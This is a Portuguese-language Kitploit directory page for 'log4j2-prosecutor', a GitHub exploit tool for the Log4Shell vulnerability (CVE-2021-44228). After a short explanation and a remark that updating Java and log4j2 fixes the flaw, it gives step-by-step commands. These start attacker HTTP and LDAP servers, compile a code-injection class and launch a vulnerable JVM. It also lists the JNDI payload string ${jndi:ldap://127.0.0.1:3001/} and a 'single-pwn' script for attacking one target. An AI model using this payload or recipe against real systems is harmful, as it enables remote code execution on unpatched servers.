Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
log4j2-prosecutor — CVE-2021-44228 | Kitploit
Ferramentas/GitHubGitHub/rodfer0x80/log4j2-prosecutor
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubrodfer0x80/log4j2-prosecutor

log4j2-prosecutor

CVE-2021-44228

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

log4j2-prosecutor

Motivação

Esta vulnerabilidade fundamental foi relatada por [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) e corrigida por [este artigo. (8u121 Release Notes)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)

No entanto, a biblioteca de logging para java chamada log4j2 tinha (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java), que permitia acesso a protocolos como LDAP, o que permitia injeção de código em versões mais antigas do java.

Versões corrigidas do java podem prevenir injeção de código, mas `JNDILookup` faz requisição ao servidor ldap, o que pode levar a vazamentos de IP.

A solução é atualizar as versões do **Java** e do **log4j2**.

Execução

  1. Instalar dependências
root@kitploit:~
cd http-server && npm install && cd ../ldap-server && npm install
  1. Executar http-server e ldap-server ambos
root@kitploit:~
cd http-server && node index.js &
cd ldap-server && node index.js
  1. Compilar Main.java
root@kitploit:~
# Isto irá gerar Main.java - necessário para injeção de código.
# OSx
./java-single-compile <Main.java>
# Linux 
javac <Main.java>
  1. Iniciar jvm com parâmetros
root@kitploit:~
# Você ainda pode usar o log4j-client no repositório para testes internos.
cd log4j-client &&\
		gradle jar &&\
		java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Ou executar outra aplicação, com.sun.jndi.ldap.object.trustURLCodebase=true é necessário para injeção de código, caso contrário fará apenas requisição ao servidor ldap.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
  1. Enviar payload para qualquer parâmetro como payload (No minecraft, apenas conversar isso funcionará se o exploit estiver funcionando.)
root@kitploit:~
${jndi:ldap://127.0.0.1:3001/}
  1. Limpeza
root@kitploit:~
NODEP=`pgrep node`
for id in $NODEP; do
    kill $id
done

Scripts

root@kitploit:~
# Pwn de alvo único
# Editar exploit-configs.txt com url e parâmetros
cd scripts/single-pwn && python3 __main__.py

Referências

  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/NCSC-NL/log4shell
  • https://github.com/ilsubyeega/log4j2-exploits/
  • https://raw.githubusercontent.com/ferderplays/Log4j_exploit/main/Exploit.java
  • https://www.blumira.com/analysis-log4shell-local-trigger/ (todo)

Licença [GPL3]

Consulte a Licença no arquivo LICENSE

Baixar ferramenta